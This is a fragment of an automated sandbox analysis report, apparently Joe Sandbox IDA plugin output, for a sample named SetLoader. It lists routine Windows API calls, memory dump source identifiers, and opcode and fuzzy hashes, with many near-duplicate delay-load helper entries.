                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AddressProc
                                              • String ID:
                                              • API String ID: 190572456-0
                                              • Opcode ID: ab5709f1d64a4bd3a57f1971ec590bb8ffd01ebb5dbf58f577fd6a6c4a535d67
                                              • Instruction ID: 2ab3d34b985a057defccad737f8938182cba42ec7480d8355c03060d796b3627
                                              • Opcode Fuzzy Hash: ab5709f1d64a4bd3a57f1971ec590bb8ffd01ebb5dbf58f577fd6a6c4a535d67
                                              • Instruction Fuzzy Hash: 6111CA33A006259BAB25DE28FC509EE7397EB8B360F1A4224FD15AB354D630DC0186D2
                                              APIs
                                                • Part of subcall function 0063D786: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0063B9D3,00000001,00000364,?,00636E12,?,?,?,0063688D,00000050,?), ref: 0063D7C7
                                              • _free.LIBCMT ref: 0063EB35
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AllocateHeap_free
                                              • String ID:
                                              • API String ID: 614378929-0
                                              • Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                              • Instruction ID: bf27b5e40bc0504af0447ff50870b0a02e0757513331a84ae6ca338be0ceca5b
                                              • Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                              • Instruction Fuzzy Hash: 4101F9722003456BE331CF69DC8299AFBEEFB85370F25051DE595832C0EA71A805C7B8
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0063B9D3,00000001,00000364,?,00636E12,?,?,?,0063688D,00000050,?), ref: 0063D7C7
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: e5c04b2583b503509ffcf0c43cd1b6c24e72c636a44b03c209b925184a62e47e
                                              • Instruction ID: a1262510e4ff387fec33bf2459482148f31ca2325dc671fdb46074855b2eb9a9
                                              • Opcode Fuzzy Hash: e5c04b2583b503509ffcf0c43cd1b6c24e72c636a44b03c209b925184a62e47e
                                              • Instruction Fuzzy Hash: 9CF0E232600720A7DB356F72FC45BDB77ABEF817A0F145011F80896695CB70DD0186E5
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00636A24,?,0000015D,?,?,?,?,00637F00,000000FF,00000000,?,?), ref: 0063BCC0
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: d7e98296b23ae451acb020fe1f63cd3478b255dc20e9ed183f2569c34297b345
                                              • Instruction ID: 7b35903afb17c933871b25c6966c0c633a747d772c0bca4e474a807a0dd916b3
                                              • Opcode Fuzzy Hash: d7e98296b23ae451acb020fe1f63cd3478b255dc20e9ed183f2569c34297b345
                                              • Instruction Fuzzy Hash: 92E0ED3560062266D73027A1EC01B9B3A8BCF927A0F193121FE05A6392CF60CC0282E9
                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,0061AF75,5CB4B331,00000000,0064517A,000000FF,?,00618882,?,?), ref: 0061AFEB
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: f03958609f07f03568b1aa1280d4019fdc1593d210282f83cde73d47420e2826
                                              • Instruction ID: 0f3479518fd98299ebd2a9aea15ef8127083187ff8a823fc8ae996d81d4260c4
                                              • Opcode Fuzzy Hash: f03958609f07f03568b1aa1280d4019fdc1593d210282f83cde73d47420e2826
                                              • Instruction Fuzzy Hash: 61F05471486B069EDB349A24C4587D2B7F56B1632AF0C1B1DD0E3426E0D361A5CED651
                                              APIs
                                                • Part of subcall function 0061C4A8: FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,0061C39F,000000FF,?,?,?,?,006187BC,?,?,00000000), ref: 0061C4E6
                                                • Part of subcall function 0061C4A8: FindFirstFileW.KERNEL32(?,00000000,?,?,00000800,?,?,0061C39F,000000FF,?,?,?,?,006187BC,?,?), ref: 0061C516
                                                • Part of subcall function 0061C4A8: GetLastError.KERNEL32(?,?,00000800,?,?,0061C39F,000000FF,?,?,?,?,006187BC,?,?,00000000,0000003A), ref: 0061C522
                                              • FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,006187BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0061C3A5
                                              Similarity
                                              • API ID: Find$FileFirst$CloseErrorLast
                                              • String ID:
                                              • API String ID: 1464966427-0
                                              • Opcode ID: c7ab113d44d56f7f2aa34e73b725733c995ed13f0717ce2af9919a0c9c19a204
                                              • Instruction ID: 2407839a796a8976b2fb91ee62d19fcfdc975399da3897fa8b99c647f261f068
                                              • Opcode Fuzzy Hash: c7ab113d44d56f7f2aa34e73b725733c995ed13f0717ce2af9919a0c9c19a204
                                              • Instruction Fuzzy Hash: B9F0E235088780AACB621BB498017DA7B925F26332F08CA0DF1FE121A2C2B060C58B72
                                              APIs
                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00622F19
                                              Similarity
                                              • API ID: ExecutionStateThread
                                              • String ID:
                                              • API String ID: 2211380416-0
                                              • Opcode ID: 81bfca070d1cdadf377924ea7d2952e7580ed02ad52a33b22d4714989e74a104
                                              • Instruction ID: 74df4126d3a31184aee6bcfb821cc9b9679eda4c7a50d824f88cda28204db750
                                              • Opcode Fuzzy Hash: 81bfca070d1cdadf377924ea7d2952e7580ed02ad52a33b22d4714989e74a104
                                              • Instruction Fuzzy Hash: 89D02B00B8C63165D7563B24782A7FD15271FC3312F0C002AB009673D38B5E0C8686F6
                                              APIs
                                              • GdipAlloc.GDIPLUS(00000010), ref: 0062C5BC
                                                • Part of subcall function 0062C34D: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0062C36E
                                              Similarity
                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                              • String ID:
                                              • API String ID: 1915507550-0
                                              • Opcode ID: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
                                              • Instruction ID: a4a0dc5fbc79ddff60ac5764fed04fed579bdfe7772609742f34372984ef1a04
                                              • Opcode Fuzzy Hash: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
                                              • Instruction Fuzzy Hash: D9D0A730600608B6DF416B30DC0297E7596DB00350F0084257801D9140EEB1DA20ADA1
                                              APIs
                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 006301A4
                                                • Part of subcall function 0062D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0062D875
                                                • Part of subcall function 0062D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0062D886
                                                • Part of subcall function 0062D864: IsDialogMessageW.USER32(00010418,?), ref: 0062D89A
                                                • Part of subcall function 0062D864: TranslateMessage.USER32(?), ref: 0062D8A8
                                                • Part of subcall function 0062D864: DispatchMessageW.USER32(?), ref: 0062D8B2
                                              Similarity
                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                              • String ID:
                                              • API String ID: 897784432-0
                                              • Opcode ID: 3ba28b4286d5625b71726101c85d827e10f23dbde770595ab59228adf6336e93
                                              • Instruction ID: 825b3ccc1d8234104cd737ade6e95e9c2200b3867c559bc44502216f9ddb1c65
                                              • Opcode Fuzzy Hash: 3ba28b4286d5625b71726101c85d827e10f23dbde770595ab59228adf6336e93
                                              • Instruction Fuzzy Hash: B1D09E71158300BAD7416B51DD06F1E7AE3BB98B05F005558B288340F5C662AE21AF1A
                                              APIs
                                              • DloadProtectSection.DELAYIMP ref: 00630AC0
                                              Similarity
                                              • API ID: DloadProtectSection
                                              • String ID:
                                              • API String ID: 2203082970-0
                                              • Opcode ID: 0782be12cc914cb8e45a8e8e44739f3daf1b0efe8cfa245514661bd0ec0e262e
                                              • Instruction ID: a5bd7f3e903218dd58ac4c9bf3257b86503c05903e74b2aaa36237203d02a841
                                              • Opcode Fuzzy Hash: 0782be12cc914cb8e45a8e8e44739f3daf1b0efe8cfa245514661bd0ec0e262e
                                              • Instruction Fuzzy Hash: 02D01230A01B089DF365EB68ECAE7643293BB09708F951484B50FD6195C7F154C8968D
                                              APIs
                                              • GetFileType.KERNELBASE(000000FF,0061B18A,?,?,?,00000000,0061B662,?,?,00000000,?,?), ref: 0061B294
                                              Similarity
                                              • API ID: FileType
                                              • String ID:
                                              • API String ID: 3081899298-0
                                              • Opcode ID: 866da71ea29f175205344b2cea8b59d4e8df74a86532fc4defb359441ee0a935
                                              • Instruction ID: 6afb4bf65db7ec772e51a6d6a09cf46b8a7e5803d82a87ef93b18ac948b42186
                                              • Opcode Fuzzy Hash: 866da71ea29f175205344b2cea8b59d4e8df74a86532fc4defb359441ee0a935
                                              • Instruction Fuzzy Hash: 01C01238000104968E304A38D8494EC7323AE533A67B8A298D02889AA2C3338DDBFA01
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f503ef8acfc14511c81c51a1dfccf4ca5a810a31c065fcfc9e6c6cb94efcb877
                                              • Instruction ID: a7fbf2942e19ee86d31aeae7fe006f4070d8bf907271dafde8afdd8a920f65fd
                                              • Opcode Fuzzy Hash: f503ef8acfc14511c81c51a1dfccf4ca5a810a31c065fcfc9e6c6cb94efcb877
                                              • Instruction Fuzzy Hash: 31B012D535C006FD321416445C23C3F024FD4C1B20731C93EF008C0040D8401C4900B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 9a9bd46e894fa02ad5df6049011976d2374c12050193d6053a3c842d562c93cc
                                              • Instruction ID: 8f323e3680bef9726b38a5658d72e7df205323b5713f287d21fe36903425f969
                                              • Opcode Fuzzy Hash: 9a9bd46e894fa02ad5df6049011976d2374c12050193d6053a3c842d562c93cc
                                              • Instruction Fuzzy Hash: 8EB012D535C002EC324852486D23C3F014FC4C5B10731C87EF40CC0140D8411C8E0171
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 308e812cd3ff2f9785d3dfc10a2db13aa1385a296626d49c5216930929c91089
                                              • Instruction ID: 51a7dbdbdec9c643c52e55aa4ca88a464709397d71301f6ca43719e71ff0538e
                                              • Opcode Fuzzy Hash: 308e812cd3ff2f9785d3dfc10a2db13aa1385a296626d49c5216930929c91089
                                              • Instruction Fuzzy Hash: A2B012D535C002EC324852986C23C3F024FD4C5B10731CC3EF00CC0140E8401C8D0171
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 705c4d8b75f0a4e04098cfa233c373c14ddc4b0cff883d438aeae243389502f7
                                              • Instruction ID: c50e9fa3f8d8e179cc34eb8b08891d8460e3b3325fc10e4430513e8f0666c43c
                                              • Opcode Fuzzy Hash: 705c4d8b75f0a4e04098cfa233c373c14ddc4b0cff883d438aeae243389502f7
                                              • Instruction Fuzzy Hash: 02B012E535C102EC324456485C23C3F014FC4C6B14731C83EF40CC0040D8401C495171
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 4ff536f46aa417867aa907ccc375bfd2379650af2d73d807d1c88fa65036ca1c
                                              • Instruction ID: ed839f8d379d42f42af601dc8f7265c6a401a3d4a883d7082375fc61cbf0e778
                                              • Opcode Fuzzy Hash: 4ff536f46aa417867aa907ccc375bfd2379650af2d73d807d1c88fa65036ca1c
                                              • Instruction Fuzzy Hash: 0DB012E935C106EC324452485C23C3F024FD4C5B10731C83EF00CC0140EC401C490271
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 7cd50c97778c106f109f9286e128381d3f5e8fc1b3805f63e7aa1aa1b2dc620b
                                              • Instruction ID: 474df4c382b3f0cdb828a952b896f4b3898d47b69e8f8a357aa458948d4a4468
                                              • Opcode Fuzzy Hash: 7cd50c97778c106f109f9286e128381d3f5e8fc1b3805f63e7aa1aa1b2dc620b
                                              • Instruction Fuzzy Hash: C8B012D535C103EC32485A486C23C3F014FC4C6B10731C83EF40CC0140D8401C8D4171
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 07f46dc07ee1c521712af5e824634f43bdfef0f78e48d251adb809e2fd1edaf8
                                              • Instruction ID: 9db89445e82e3d5a30b7aca5c13173fe7ffcafe1b01118d7866924f36f2ce854
                                              • Opcode Fuzzy Hash: 07f46dc07ee1c521712af5e824634f43bdfef0f78e48d251adb809e2fd1edaf8
                                              • Instruction Fuzzy Hash: 66B012D535C142EC338852486C23C3F014FC4C5B10731C93EF00CC0140D8401CCD0171
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: c0a65b3f7ef469f9d89c1db7068ea19081071258c14fd6cf5a1f18a8fb66b463
                                              • Instruction ID: 7bab8d5bdd58704645d0232c25dd2bed66cdc9c4506de587ebab347c0312361e
                                              • Opcode Fuzzy Hash: c0a65b3f7ef469f9d89c1db7068ea19081071258c14fd6cf5a1f18a8fb66b463
                                              • Instruction Fuzzy Hash: 9CB012D536C102EC32445248DC23C3F025FD4C5B10731C93FF00CC0040D8401C4901B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 782e1951079851b91afdbdf4ce7551ee4b9b8aad357f11953e6fcc7edaf0e626
                                              • Instruction ID: 14222f8ac01d6d41665070773946400ed3ebc97cbbf66c92e44357e335d42518
                                              • Opcode Fuzzy Hash: 782e1951079851b91afdbdf4ce7551ee4b9b8aad357f11953e6fcc7edaf0e626
                                              • Instruction Fuzzy Hash: B6B012E935C202EC324456485C23C3F014FC4C6B10731C83EF40CC0140EC402C494171
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f7f2f62f93856c6fd4149b462bf3fa3a906f9a36ce937261f18bb71af2366b76
                                              • Instruction ID: c93bff8cacd848908594f0d6a79949c38e9cb9d6b549000e9c50c40ef89d974a
                                              • Opcode Fuzzy Hash: f7f2f62f93856c6fd4149b462bf3fa3a906f9a36ce937261f18bb71af2366b76
                                              • Instruction Fuzzy Hash: 66B012E935C202EC338452485C23C3F014FC4C5B10731C93EF00CC0140EC401C894171
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 77df8b45d33c0bd15a50c66d82c9a6ea97febf3669a1fcd20943aa2a8a88b02d
                                              • Instruction ID: 3a6bef65975be216bb2bf7753700ef05045ddb3e8af26e658686e872f9f6dc3e
                                              • Opcode Fuzzy Hash: 77df8b45d33c0bd15a50c66d82c9a6ea97febf3669a1fcd20943aa2a8a88b02d
                                              • Instruction Fuzzy Hash: ACB012D535C002EC32445248DD23C3F015FC4C5B10771CA7EF40CC0040D8411C4A01B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 117d4619798efd87a9ef0c368f06505ef806d6eba45fd6405be1530e84b36d7e
                                              • Instruction ID: 8150f88d62e586d772aba177334f3dbdab2809b6d69d4575762c25289bb199db
                                              • Opcode Fuzzy Hash: 117d4619798efd87a9ef0c368f06505ef806d6eba45fd6405be1530e84b36d7e
                                              • Instruction Fuzzy Hash: 33B012D535D102EC324456585C23C3F014FC4C6B10B31C83EF40CC0080D8401C4941B1
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
